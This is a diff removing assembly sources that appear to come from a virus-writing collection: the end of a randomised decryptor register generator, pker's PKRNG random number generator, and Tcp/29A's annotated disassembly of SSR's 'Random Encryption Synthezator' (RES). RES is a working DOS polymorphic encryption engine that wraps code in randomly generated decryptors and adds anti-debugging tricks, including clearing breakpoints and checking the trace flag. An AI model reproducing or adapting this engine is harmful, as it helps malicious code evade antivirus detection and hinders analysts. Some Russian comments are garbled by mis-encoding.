ret ; Âîçâðàò èç ïîäïðîãðàììû
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; REGISTER MUTATOR SUBROUTINE ;
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
; [ IN ] ;
|
|
||||||
; ;
|
|
||||||
; NO INPUT IN SUBROTINE ;
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
; [ OUT ] ;
|
|
||||||
; ;
|
|
||||||
; USES REGISTER N1 -> BH (0..7) ;
|
|
||||||
; USES REGISTER N2 -> BL (0..7) ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
reg_mutate:
|
|
||||||
; Ïîäïðîãðàììà ãåíåðàöèè
|
|
||||||
generate1: ; ðåãèñòðîâ äëÿ äåêðèïòîðà
|
|
||||||
|
|
||||||
mov eax,8 ; Ïîëó÷àåì ñëó÷àéíîå ÷èñëî
|
|
||||||
call brandom32 ; â äèàïàçîíå 0..7
|
|
||||||
cmp al,00000100b ; Èñïîëüçóåì âñå ðåãèñòðû
|
|
||||||
je generate1 ; êðîìå esp
|
|
||||||
cmp al,00000101b ; Èñïîëüçóåì âñå ðåãèñòðû
|
|
||||||
je generate1 ; êðîìå ebp
|
|
||||||
mov bh,al ; Ñîõðàíÿåì ïîëó÷åííûé
|
|
||||||
; ðåãèñòð
|
|
||||||
generate2:
|
|
||||||
mov eax,8 ; Ïîëó÷àåì ñëó÷àéíîå ÷èñëî
|
|
||||||
call brandom32 ; â äèàïàçîíå 0..7
|
|
||||||
cmp al,bh ; Íå äîëæíî áûòü äâóõ
|
|
||||||
je generate2 ; èäåíòè÷íûõ ðåãèñòðîâ
|
|
||||||
cmp al,00000100b ; Èñïîëüçóåì âñå ðåãèñòðû
|
|
||||||
je generate2 ; êðîìå esp
|
|
||||||
mov bl,al ; Ñîõðàíÿåì ïîëó÷åííûé
|
|
||||||
; ðåãèñòð
|
|
||||||
ret ; Âîçâðàò èç ïîäïðîãðàììû
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
sz_decr dd 0 ;
|
|
||||||
begin_code dd 0 ; Äàííûå íåîáõîäèìûå äëÿ
|
|
||||||
st_code dd 0 ; êîððåêòíîé ðàáîòû
|
|
||||||
sz_code dd 0 ; ãåíåðàòîðà
|
|
||||||
buff dd 0 ;
|
|
||||||
key2 dd 0 ;
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
len dd 0,0,0,0,0,0,0,0,0 ; Ìåñòî äëÿ õðàíåíèÿ äëèí
|
|
||||||
;------------------------------------------------------------------------------;
|
|
@ -1,222 +0,0 @@
|
|||||||
;
|
|
||||||
; pker's Random Number Generator (PKRNG)
|
|
||||||
; ======================================
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Description
|
|
||||||
; -----------
|
|
||||||
;
|
|
||||||
; PKRNG is a random number generator. It can be used for MASM, TASM, FASM, etc. It
|
|
||||||
; containz four procedurez: __randomize, __random and __m_seq_gen and
|
|
||||||
; __random_rdtsc. __randomize procedure is for generating initial seed in the seed
|
|
||||||
; field, which specified as parameter. The __m_seq_gen procedure is used to
|
|
||||||
; generate m-sequence, which used by __random, which generate random numberz
|
|
||||||
; finally. __random_rdtsc is the simplest one, it just get the RDTSC and divide it
|
|
||||||
; by the range given as parameter.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; How to use PKRNG
|
|
||||||
; ----------------
|
|
||||||
;
|
|
||||||
; When using MASM or TASM to initialize seed field:
|
|
||||||
;
|
|
||||||
; mov edi,offset dwSeed
|
|
||||||
; call __randomize
|
|
||||||
;
|
|
||||||
; The get a random number in eax:
|
|
||||||
;
|
|
||||||
; mov eax,offset dwSeed
|
|
||||||
; mov ecx,32 ; get a random number between 0~31
|
|
||||||
; call __random
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Same thing happened with FASM:
|
|
||||||
;
|
|
||||||
; mov edi,dwSeed
|
|
||||||
; call __randomize
|
|
||||||
;
|
|
||||||
; mov eax,dwSeed
|
|
||||||
; mov ecx,32 ; get a random number between 0~31
|
|
||||||
; call __random
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Copyright
|
|
||||||
; ---------
|
|
||||||
;
|
|
||||||
; (c) 2004. No rightz reserved. Use without permission :P.
|
|
||||||
;
|
|
||||||
|
|
||||||
|
|
||||||
;
|
|
||||||
; __randomize procedure
|
|
||||||
; =====================
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Description
|
|
||||||
; -----------
|
|
||||||
;
|
|
||||||
; This function use RDTSC instruction to generator a random number in order to
|
|
||||||
; initialize the seed field.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Parameterz and Return Values
|
|
||||||
; ----------------------------
|
|
||||||
;
|
|
||||||
; input:
|
|
||||||
; edi --- points to the seed field
|
|
||||||
; output:
|
|
||||||
; nothing
|
|
||||||
;
|
|
||||||
|
|
||||||
__randomize: pushad
|
|
||||||
db 0fh,31h ; RDTSC
|
|
||||||
add eax,edx ; ...
|
|
||||||
stosd ; fill in the seed buffer
|
|
||||||
popad
|
|
||||||
ret
|
|
||||||
|
|
||||||
|
|
||||||
;
|
|
||||||
; __random procedure
|
|
||||||
; ==================
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Description
|
|
||||||
; -----------
|
|
||||||
;
|
|
||||||
; This function generates a random number and rewrite the seed field. The function
|
|
||||||
; first get a 32 bit m-sequence, which then multiply with the previous seed, with
|
|
||||||
; __m_seq_gen procedure. And then, it calls __m_seq_gen again to generate another
|
|
||||||
; m-sequence to make noise by adding on the DWORD calculated before. Also, this
|
|
||||||
; result is the new seed, and will be write to the seed field which pointed by EAX
|
|
||||||
; as argument. Finally, the seed is divided by ECX, and return the modulus, which
|
|
||||||
; is the expected random number.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Parameterz and Return Values
|
|
||||||
; ----------------------------
|
|
||||||
;
|
|
||||||
; input:
|
|
||||||
; eax --- pointz to the random seed field
|
|
||||||
; edx --- the range of the random number to be generated
|
|
||||||
; output:
|
|
||||||
; eax --- random number as result
|
|
||||||
;
|
|
||||||
|
|
||||||
__random: pushad
|
|
||||||
xchg ecx,edx
|
|
||||||
mov edi,eax
|
|
||||||
mov esi,eax
|
|
||||||
lodsd ; get the previous seed value
|
|
||||||
mov ebx,eax
|
|
||||||
mov ebp,ebx
|
|
||||||
call __m_seq_gen ; generate a m-sequence
|
|
||||||
imul ebp ; multiply with the previous seed
|
|
||||||
xchg ebx,eax
|
|
||||||
call __m_seq_gen ; generate anothe m-sequence
|
|
||||||
add eax,ebx ; to make noise...
|
|
||||||
add eax,92151fech ; and some noisez...
|
|
||||||
stosd ; write new seed value
|
|
||||||
xor edx,edx
|
|
||||||
div ecx ; calculate the random number
|
|
||||||
mov [esp+28],edx ; according to a specified range
|
|
||||||
popad
|
|
||||||
ret
|
|
||||||
|
|
||||||
|
|
||||||
;
|
|
||||||
; __m_seq_gen procedure
|
|
||||||
; =====================
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Description
|
|
||||||
; -----------
|
|
||||||
;
|
|
||||||
; This function use a PN (Pseudo Noise) generator to generate m-sequencez. The
|
|
||||||
; configuration of the generator shows below (figure 1):
|
|
||||||
;
|
|
||||||
; (module 2 addition)
|
|
||||||
; ___
|
|
||||||
; / \
|
|
||||||
; +---------- | + | <------------------------------+
|
|
||||||
; | \___/ |
|
|
||||||
; | A |
|
|
||||||
; | +-----+ | +-----+ +-----+ |
|
|
||||||
; +--> | D31 | -+-> | D30 | ---> ... ---> | D01 | -+-> output
|
|
||||||
; +-----+ +-----+ +-----+
|
|
||||||
; A A A
|
|
||||||
; | | |
|
|
||||||
; CLK ---------------+------------+---------------------+
|
|
||||||
;
|
|
||||||
; figure 1. m-Sequence Generator
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Parameterz and Return Values
|
|
||||||
; ----------------------------
|
|
||||||
;
|
|
||||||
; input:
|
|
||||||
; eax --- a non-zero random number, which could be generated by RDTSC or
|
|
||||||
; GetTickCount or such functionz
|
|
||||||
; output:
|
|
||||||
; eax --- the result of the function
|
|
||||||
;
|
|
||||||
|
|
||||||
__m_seq_gen: pushad
|
|
||||||
xor esi,esi ; use to save the 32bit m-sequence
|
|
||||||
push 32 ; loop 32 times (but it's not a
|
|
||||||
pop ecx ; cycle in the m-sequence generator)
|
|
||||||
msg_next_bit: mov ebx,eax
|
|
||||||
mov ebp,ebx
|
|
||||||
xor edx,edx
|
|
||||||
inc edx
|
|
||||||
and ebp,edx ; get the lowest bit
|
|
||||||
dec cl
|
|
||||||
shl ebp,cl
|
|
||||||
or esi,ebp ; output...
|
|
||||||
inc cl
|
|
||||||
and ebx,80000001h ; \
|
|
||||||
ror bx,1 ; \
|
|
||||||
mov edx,ebx ; \
|
|
||||||
ror ebx,16 ; module 2 addition
|
|
||||||
xor bx,dx ; /
|
|
||||||
rcl ebx,17 ; /
|
|
||||||
rcr eax,1 ; /
|
|
||||||
loop msg_next_bit
|
|
||||||
mov [esp+28],esi
|
|
||||||
popad
|
|
||||||
ret
|
|
||||||
|
|
||||||
|
|
||||||
;
|
|
||||||
; __random_rdtsc procedure
|
|
||||||
; ========================
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Description
|
|
||||||
; -----------
|
|
||||||
;
|
|
||||||
; This is the simplest RNG in the packet. Well, nothing to explain :P
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Parameterz and Return Value
|
|
||||||
; ---------------------------
|
|
||||||
;
|
|
||||||
; input:
|
|
||||||
; ecx --- the range of the random number to be generated
|
|
||||||
;
|
|
||||||
; output:
|
|
||||||
; eax --- random number as result
|
|
||||||
;
|
|
||||||
|
|
||||||
__random_rdtsc: pushad
|
|
||||||
db 0fh,31h
|
|
||||||
add eax,edx
|
|
||||||
xor edx,edx
|
|
||||||
or ecx,ecx
|
|
||||||
jz rnd_rdt_no_range
|
|
||||||
div ecx
|
|
||||||
xchg eax,edx
|
|
||||||
rnd_rdt_no_range:
|
|
||||||
mov [esp+28],eax
|
|
||||||
popad
|
|
||||||
ret
|
|
File diff suppressed because it is too large
Load Diff
@ -1,458 +0,0 @@
|
|||||||
; - -[RES.ASM]- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
|
|
||||||
;
|
|
||||||
; Random Encryption Synthezator (RES), by SSR
|
|
||||||
; Disasm by Tcp/29A (tcp@cryogen.com)
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Entry:
|
|
||||||
; DS:DX = code
|
|
||||||
; BX = runtime offset
|
|
||||||
; CX = number of bytes to encrypt
|
|
||||||
; Return:
|
|
||||||
; DS:DX = encryptor+code
|
|
||||||
; CX = size encryptor+code
|
|
||||||
|
|
||||||
|
|
||||||
.386p
|
|
||||||
RES segment use16
|
|
||||||
assume cs:RES, ds:RES, es:RES, ss:RES
|
|
||||||
org 0
|
|
||||||
|
|
||||||
RES_SIZE_DEC equ 300h ; But it only needs 169h
|
|
||||||
|
|
||||||
res_engine:
|
|
||||||
start:
|
|
||||||
call res_delta
|
|
||||||
res_delta:
|
|
||||||
pop si
|
|
||||||
sub si,3 ; Get delta-offset
|
|
||||||
pop ax
|
|
||||||
push cs
|
|
||||||
push ax
|
|
||||||
push es
|
|
||||||
mov ax,es
|
|
||||||
sub ax,10h
|
|
||||||
mov es,ax
|
|
||||||
mov di,100h
|
|
||||||
push cx
|
|
||||||
mov cx,offset(end_res)
|
|
||||||
nop
|
|
||||||
push ds
|
|
||||||
push cs
|
|
||||||
pop ds
|
|
||||||
cld
|
|
||||||
rep movsb ; Copy RES code to working area
|
|
||||||
pop ds
|
|
||||||
pop cx
|
|
||||||
mov ax,offset(res_start+100h)
|
|
||||||
push es
|
|
||||||
push ax
|
|
||||||
retf ; jmp res_start
|
|
||||||
|
|
||||||
res_start:
|
|
||||||
pop es
|
|
||||||
mov si,100h
|
|
||||||
mov ax,es
|
|
||||||
add ax,(end_res-start+15)/16+1
|
|
||||||
mov es,ax ; Calculate base segment for decryptor
|
|
||||||
mov cs:[si+runtime_ofs],bx
|
|
||||||
mov cs:[si+code_length],cx
|
|
||||||
push cx
|
|
||||||
mov cx,RES_SIZE_DEC
|
|
||||||
xor di,di
|
|
||||||
mov al,90h ; NOP
|
|
||||||
cld
|
|
||||||
rep stosb ; Fill with NOPs
|
|
||||||
call init_masks
|
|
||||||
mov cx,8 ; 8 instructions per decryptor
|
|
||||||
xor di,di
|
|
||||||
add di,si
|
|
||||||
l_select_instructions:
|
|
||||||
push cx
|
|
||||||
call RES_get_random
|
|
||||||
mov ah,0
|
|
||||||
push cx
|
|
||||||
mov cl,5
|
|
||||||
shr al,cl ; AX in [0..7]
|
|
||||||
shl ax,1
|
|
||||||
shl ax,1 ; AX:=AX*4 (4 bytes per instruction)
|
|
||||||
pop cx
|
|
||||||
push di
|
|
||||||
push si
|
|
||||||
add di,offset(buffer_decryptor)
|
|
||||||
add si,offset(decryptor_table)
|
|
||||||
add si,ax
|
|
||||||
push ax
|
|
||||||
mov ax,cs:[si] ; Select an instruction for decryptor
|
|
||||||
mov cs:[di],ax ; and store it
|
|
||||||
mov ax,cs:[si+2]
|
|
||||||
mov cs:[di+2],ax
|
|
||||||
pop ax
|
|
||||||
pop si
|
|
||||||
pop di
|
|
||||||
push di
|
|
||||||
push si
|
|
||||||
add di,offset(buffer_encryptor)
|
|
||||||
add si,offset(encryptor_table)
|
|
||||||
add si,ax
|
|
||||||
push ax
|
|
||||||
mov ax,cs:[si] ; Select the instruction for encryptor
|
|
||||||
mov cs:[di],ax ; and store it
|
|
||||||
mov ax,cs:[si+2]
|
|
||||||
mov cs:[di+2],ax
|
|
||||||
pop ax
|
|
||||||
pop si
|
|
||||||
pop di
|
|
||||||
add di,4
|
|
||||||
pop cx
|
|
||||||
loop l_select_instructions
|
|
||||||
call reverse_decryptor_table
|
|
||||||
call make_encryptor
|
|
||||||
pop cx
|
|
||||||
push cx
|
|
||||||
mov bp,dx
|
|
||||||
mov di,RES_SIZE_DEC
|
|
||||||
mov cs:[si+code_CRC],0
|
|
||||||
l_encrypt_code:
|
|
||||||
mov al,ds:[bp]
|
|
||||||
mov es:[di],al
|
|
||||||
mov ah,0
|
|
||||||
add cs:[si+code_CRC],ax ; Make code CRC
|
|
||||||
|
|
||||||
encryptor db 8*4 dup(90h) ; Buffer for encryptor
|
|
||||||
|
|
||||||
inc di
|
|
||||||
inc bp
|
|
||||||
loop l_encrypt_code
|
|
||||||
push ds
|
|
||||||
push cs
|
|
||||||
pop ds
|
|
||||||
xor di,di
|
|
||||||
push si
|
|
||||||
add si,offset(decryptor_code)
|
|
||||||
mov cx,decrypted_code-decryptor_code
|
|
||||||
nop
|
|
||||||
cld
|
|
||||||
rep movsb ; Copy decryptor to buffer
|
|
||||||
pop si
|
|
||||||
pop ds
|
|
||||||
push es
|
|
||||||
pop ds
|
|
||||||
xor dx,dx ; DS:DX = Address of decryptor+code
|
|
||||||
pop cx
|
|
||||||
add cx,RES_SIZE_DEC ; Decryptor+encrypted code
|
|
||||||
retf
|
|
||||||
|
|
||||||
db 0
|
|
||||||
db 'RandomEncryptionSynthezator',0
|
|
||||||
db 'ü S.S.R. 1996-97',0
|
|
||||||
|
|
||||||
init_masks:
|
|
||||||
push si
|
|
||||||
mov cx,3 ; Only first 3 instructions need a mask
|
|
||||||
l_next_mask:
|
|
||||||
call RES_get_random
|
|
||||||
mov byte ptr cs:[si+decryptor_table+3],al ; Store mask
|
|
||||||
mov byte ptr cs:[si+encryptor_table+3],al
|
|
||||||
add si,4 ; Next inst.
|
|
||||||
loop l_next_mask
|
|
||||||
pop si
|
|
||||||
ret
|
|
||||||
|
|
||||||
RES_get_random:
|
|
||||||
pushf
|
|
||||||
in al,40h ; Get random number
|
|
||||||
ror al,1
|
|
||||||
xor al,53h
|
|
||||||
popf
|
|
||||||
ret
|
|
||||||
|
|
||||||
make_encryptor:
|
|
||||||
push es
|
|
||||||
push ds
|
|
||||||
push cs
|
|
||||||
pop es
|
|
||||||
push cs
|
|
||||||
pop ds
|
|
||||||
push si
|
|
||||||
in al,40h ; Get random number
|
|
||||||
mov cx,8
|
|
||||||
mov di,offset(encryptor)
|
|
||||||
add di,si
|
|
||||||
add si,offset(buffer_encryptor)
|
|
||||||
l_make_encryptor:
|
|
||||||
rcr al,1 ; Add instruction to encryptor?
|
|
||||||
jc add_instruction ; Yes? then jmp
|
|
||||||
nop
|
|
||||||
nop
|
|
||||||
add si,4
|
|
||||||
loop_make_encryptor:
|
|
||||||
loop l_make_encryptor
|
|
||||||
jmp encryptor_done
|
|
||||||
nop
|
|
||||||
|
|
||||||
add_instruction:
|
|
||||||
cld
|
|
||||||
push cx
|
|
||||||
mov cx,4
|
|
||||||
rep movsb ; Store instruction
|
|
||||||
pop cx
|
|
||||||
jmp loop_make_encryptor
|
|
||||||
|
|
||||||
encryptor_done:
|
|
||||||
pop si
|
|
||||||
pop ds
|
|
||||||
pop es
|
|
||||||
ret
|
|
||||||
|
|
||||||
reverse_decryptor_table:
|
|
||||||
push ax
|
|
||||||
push bp
|
|
||||||
push di
|
|
||||||
push cx
|
|
||||||
push bx
|
|
||||||
mov cx,8/2
|
|
||||||
mov di,offset(buffer_decryptor)
|
|
||||||
add di,si
|
|
||||||
mov bp,offset(end_buffer_dec)-4 ; Point to last inst.
|
|
||||||
add bp,si
|
|
||||||
l_reverse_table:
|
|
||||||
mov ax,cs:[di] ; Xchg instructions
|
|
||||||
mov bx,cs:[bp]
|
|
||||||
mov cs:[di],bx
|
|
||||||
mov cs:[bp],ax
|
|
||||||
mov ax,cs:[di+2]
|
|
||||||
mov bx,cs:[bp+2]
|
|
||||||
mov cs:[di+2],bx
|
|
||||||
mov cs:[bp+2],ax
|
|
||||||
sub bp,4 ; xchg next instruction
|
|
||||||
add di,4
|
|
||||||
loop l_reverse_table
|
|
||||||
pop bx
|
|
||||||
pop cx
|
|
||||||
pop di
|
|
||||||
pop bp
|
|
||||||
pop ax
|
|
||||||
ret
|
|
||||||
|
|
||||||
db 4 ; Unused !!
|
|
||||||
|
|
||||||
decryptor_code:
|
|
||||||
runtime_ofs equ word ptr $+1
|
|
||||||
mov bp,0 ; mov bp,runtime_ofs
|
|
||||||
push 1100h+(90h+3Ch-20h)
|
|
||||||
sub bp,offset(decryptor_code)
|
|
||||||
mov di,offset(decryptor)
|
|
||||||
add di,bp
|
|
||||||
pop ax ; AX:=1100h+(90h+3Ch-20h)
|
|
||||||
inc cs:[bp+n_decryptors] ; Inc # of tested decryptors
|
|
||||||
mov cs:[bp+decryptor_ok],0 ; Decryptor not found
|
|
||||||
mov cs:[bp+decrypting],0 ; Not decrypting
|
|
||||||
mov cx,20h
|
|
||||||
push es
|
|
||||||
push ds
|
|
||||||
add ax,cx
|
|
||||||
push cs
|
|
||||||
pop es
|
|
||||||
push cs
|
|
||||||
pop ds
|
|
||||||
cld
|
|
||||||
dec cx
|
|
||||||
sub al,3Ch ; AL:=90h (NOP)
|
|
||||||
rep stosb
|
|
||||||
add al,3Ch ; AL:=0CCh (int 3)
|
|
||||||
stosb
|
|
||||||
cmp cs:[bp+n_decryptors],150 ; < 150 decryptors tested?
|
|
||||||
jb create_random_decryptor ; Yes? then jmp
|
|
||||||
nop
|
|
||||||
nop
|
|
||||||
mov ax,cs:[bp+n_decryptors] ; Don't use a random number.
|
|
||||||
; n_decryptors will be increased, so it'll
|
|
||||||
; find the correct decryptor.
|
|
||||||
jmp create_decryptor
|
|
||||||
nop
|
|
||||||
|
|
||||||
db 66h ; Unused!? (antidebug??)
|
|
||||||
|
|
||||||
create_random_decryptor:
|
|
||||||
in al,40h ; Get random number
|
|
||||||
create_decryptor:
|
|
||||||
mov cs:[bp+decryptor_id],al ; Why? Never use it!!
|
|
||||||
mov cx,8
|
|
||||||
mov si,offset(buffer_decryptor)
|
|
||||||
add si,bp
|
|
||||||
mov di,offset(decryptor)
|
|
||||||
add di,bp
|
|
||||||
l_make_random_decryptor:
|
|
||||||
rcr al,1 ; Add instruction to decryptor?
|
|
||||||
jc add_inst_dec ; Yes? then jmp
|
|
||||||
nop
|
|
||||||
nop
|
|
||||||
add si,4
|
|
||||||
next_dec_instruction:
|
|
||||||
loop l_make_random_decryptor
|
|
||||||
jmp done_random_decryptor
|
|
||||||
nop
|
|
||||||
|
|
||||||
add_inst_dec:
|
|
||||||
cld
|
|
||||||
push cx
|
|
||||||
mov cx,4
|
|
||||||
rep movsb ; Add instruction
|
|
||||||
pop cx
|
|
||||||
jmp next_dec_instruction
|
|
||||||
|
|
||||||
done_random_decryptor:
|
|
||||||
mov di,RES_SIZE_DEC
|
|
||||||
add di,cs:[bp+runtime_ofs]
|
|
||||||
code_length equ word ptr $+1
|
|
||||||
mov cx,0 ; mov cx,code_length
|
|
||||||
mov bx,cs:[bp+code_CRC]
|
|
||||||
l_random_decryptor:
|
|
||||||
mov dl,cs:[di]
|
|
||||||
|
|
||||||
decryptor db 8*4 dup(90h)
|
|
||||||
|
|
||||||
mov al,dl
|
|
||||||
mov ah,0
|
|
||||||
sub bx,ax ; Calculate CRC
|
|
||||||
cmp cs:[bp+decrypting],1 ; Decrypting?
|
|
||||||
je decrypt_byte ; Yes? then jmp
|
|
||||||
nop
|
|
||||||
nop
|
|
||||||
loop_decryptor:
|
|
||||||
inc di
|
|
||||||
loop l_random_decryptor
|
|
||||||
pop ds
|
|
||||||
pop es
|
|
||||||
cmp bx,0 ; CRC OK?
|
|
||||||
jnz decryptor_code ; No? then jmp
|
|
||||||
jmp found_decryptor ; Yes? then jmp
|
|
||||||
nop
|
|
||||||
|
|
||||||
buffer_decryptor db 8*4 dup(90h)
|
|
||||||
end_buffer_dec:
|
|
||||||
|
|
||||||
code_CRC dw 0
|
|
||||||
decryptor_ok db 0
|
|
||||||
decrypting db 0
|
|
||||||
db 0Bh ; Unused!
|
|
||||||
db 0Bh ; Unused!
|
|
||||||
db 0Bh ; Unused!
|
|
||||||
decryptor_id db 0
|
|
||||||
n_decryptors dw 0
|
|
||||||
|
|
||||||
decrypt_byte:
|
|
||||||
mov cs:[di],dl ; Store decrypted byte
|
|
||||||
jmp loop_decryptor
|
|
||||||
|
|
||||||
found_decryptor:
|
|
||||||
cmp cs:[bp+decryptor_ok],1 ; Code decrypted?
|
|
||||||
je code_decrypted ; Yes? then jmp
|
|
||||||
nop
|
|
||||||
nop
|
|
||||||
mov cs:[bp+decrypting],1
|
|
||||||
mov cs:[bp+decryptor_ok],1
|
|
||||||
push es
|
|
||||||
push ds
|
|
||||||
jmp done_random_decryptor ; Decrypt code
|
|
||||||
|
|
||||||
code_decrypted:
|
|
||||||
jmp anti_disasm1
|
|
||||||
nop
|
|
||||||
db 69h ; Antidebug
|
|
||||||
anti_disasm1:
|
|
||||||
cli
|
|
||||||
push 3545h
|
|
||||||
jmp anti_disasm2
|
|
||||||
nop
|
|
||||||
db 0EAh ; Antidebug
|
|
||||||
anti_disasm2:
|
|
||||||
cli
|
|
||||||
inc sp
|
|
||||||
mov ax,cs:[bp]
|
|
||||||
xor ax,bx
|
|
||||||
cld
|
|
||||||
scasb
|
|
||||||
inc sp
|
|
||||||
mov ax,4202h
|
|
||||||
sub sp,2
|
|
||||||
pop ax
|
|
||||||
cmp ax,3545h ; Is it being traced?
|
|
||||||
jne decrypted_code ; Yes? then jmp
|
|
||||||
; BUG! Should jump when not traced
|
|
||||||
nop
|
|
||||||
nop
|
|
||||||
xor ax,3445h
|
|
||||||
mov es,ax
|
|
||||||
inc byte ptr cs:[0Dh]
|
|
||||||
and cx,0Fh
|
|
||||||
rep scasb
|
|
||||||
xor ax,cs:[si]
|
|
||||||
pushf
|
|
||||||
pop ax ; Get flags
|
|
||||||
and ah,0FEh ; Clear trace flag
|
|
||||||
push ax
|
|
||||||
xchg bx,cx
|
|
||||||
les bx,ds:[2Bh]
|
|
||||||
popf ; Trace flag off
|
|
||||||
xor eax,eax
|
|
||||||
mov dr7,eax ; Clear all breakpoints
|
|
||||||
dec byte ptr cs:[0Dh]
|
|
||||||
call skip_reset
|
|
||||||
db 0EAh ; jmp far ptr 0F000h:0FFF0h (reset)
|
|
||||||
dw 0FFF0h ; but never reach here because in 'skip_reset'
|
|
||||||
dw 0F000h ; it does a pop of the return address
|
|
||||||
|
|
||||||
skip_reset:
|
|
||||||
pop ax
|
|
||||||
decrypted_code: ; End of decryptor code
|
|
||||||
|
|
||||||
encryptor_table:
|
|
||||||
xor byte ptr es:[di],0
|
|
||||||
add byte ptr es:[di],0
|
|
||||||
sub byte ptr es:[di],0
|
|
||||||
nop
|
|
||||||
ror byte ptr es:[di],1
|
|
||||||
nop
|
|
||||||
rol byte ptr es:[di],1
|
|
||||||
nop
|
|
||||||
neg byte ptr es:[di]
|
|
||||||
nop
|
|
||||||
not byte ptr es:[di]
|
|
||||||
nop
|
|
||||||
neg byte ptr es:[di]
|
|
||||||
|
|
||||||
decryptor_table:
|
|
||||||
nop
|
|
||||||
xor dl,0
|
|
||||||
nop
|
|
||||||
sub dl,0
|
|
||||||
nop
|
|
||||||
add dl,0
|
|
||||||
nop
|
|
||||||
nop
|
|
||||||
rol dl,1
|
|
||||||
nop
|
|
||||||
nop
|
|
||||||
ror dl,1
|
|
||||||
nop
|
|
||||||
nop
|
|
||||||
neg dl
|
|
||||||
nop
|
|
||||||
nop
|
|
||||||
not dl
|
|
||||||
nop
|
|
||||||
nop
|
|
||||||
neg dl
|
|
||||||
|
|
||||||
buffer_encryptor db 8*4 dup(90h)
|
|
||||||
|
|
||||||
end_res:
|
|
||||||
|
|
||||||
RES ends
|
|
||||||
public res_engine
|
|
||||||
end
|
|
||||||
|
|
||||||
; End of RES disasm
|
|
||||||
; (c) 1997, Tcp/29A (tcp@cryogen.com)
|
|
@ -1,88 +0,0 @@
|
|||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; ;
|
|
||||||
; xxxxxxxxxxx xxxxxxxx xxxx xxxx xxxxxxxxxx xxxxxxxx xxxxxxxxx ;
|
|
||||||
; xxxxxxxxxxxx xxxx xxxx xxxx xxxx xxxxxxxxxxx xxxxxxxxxx xxxxxxxxxxx ;
|
|
||||||
; xxxx xxxx xxxx xxxx xxxxx xxxx xxxx xxxx xxx xxxx xxx xxxx ;
|
|
||||||
; xxxx xxxx xxxx xxxx xxxxxx xxxx xxxx xxxx xxxx ;
|
|
||||||
; xxxx xxxx xxxx xxxx xxxxxxx xxxx xxxx xxxxxxxx xxxxxxxxxx ;
|
|
||||||
; xxxxxxxxxxx xxxx xx xxxx xxxx xxxxxxx xxxx xxxxxxxx xxxxxxxxxx ;
|
|
||||||
; xxxxxxxxxxxx xxxx xx xxxx xxxx xxxxxx xxxx xxxxx xxxx xxxx ;
|
|
||||||
; xxxx xxxx xxxx xxxx xxxx xxxxx xxxx xxxx xxxx xxxx xxx ;
|
|
||||||
; xxxx xxxx xxxx xxxx xxxx xxxx xxxxxxxxxxx xxxxxxxxxx xxxxxxxxxxx ;
|
|
||||||
; xxxx xxxx xxxx xxxx xxxx xxxx xxxxxxxxxx xxxxxxxxx xxxxxxxxxxx ;
|
|
||||||
; ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; RAndom Numbers Generator ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; :)! ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; функция RANG32 ;
|
|
||||||
; ГЕНЕРАТОР СЛУЧАЙНЫХ ЧИСЕЛ (ГСЧ) ;
|
|
||||||
; ;
|
|
||||||
; ;
|
|
||||||
;ВХОД: ;
|
|
||||||
;1 параметр - число (N). Будет произведен поиск случайного числа в диапазоне [0..N-1] ;
|
|
||||||
;--------------------------------------------------------------------------------------------------------;
|
|
||||||
;ВЫХОД: ;
|
|
||||||
;EAX - слуяайное число в диапазоне [0..N-1] ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; y0p! ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; ФИЧИ ;
|
|
||||||
; ;
|
|
||||||
;(+) базонезависимость ;
|
|
||||||
;(+) прост в использовании ;
|
|
||||||
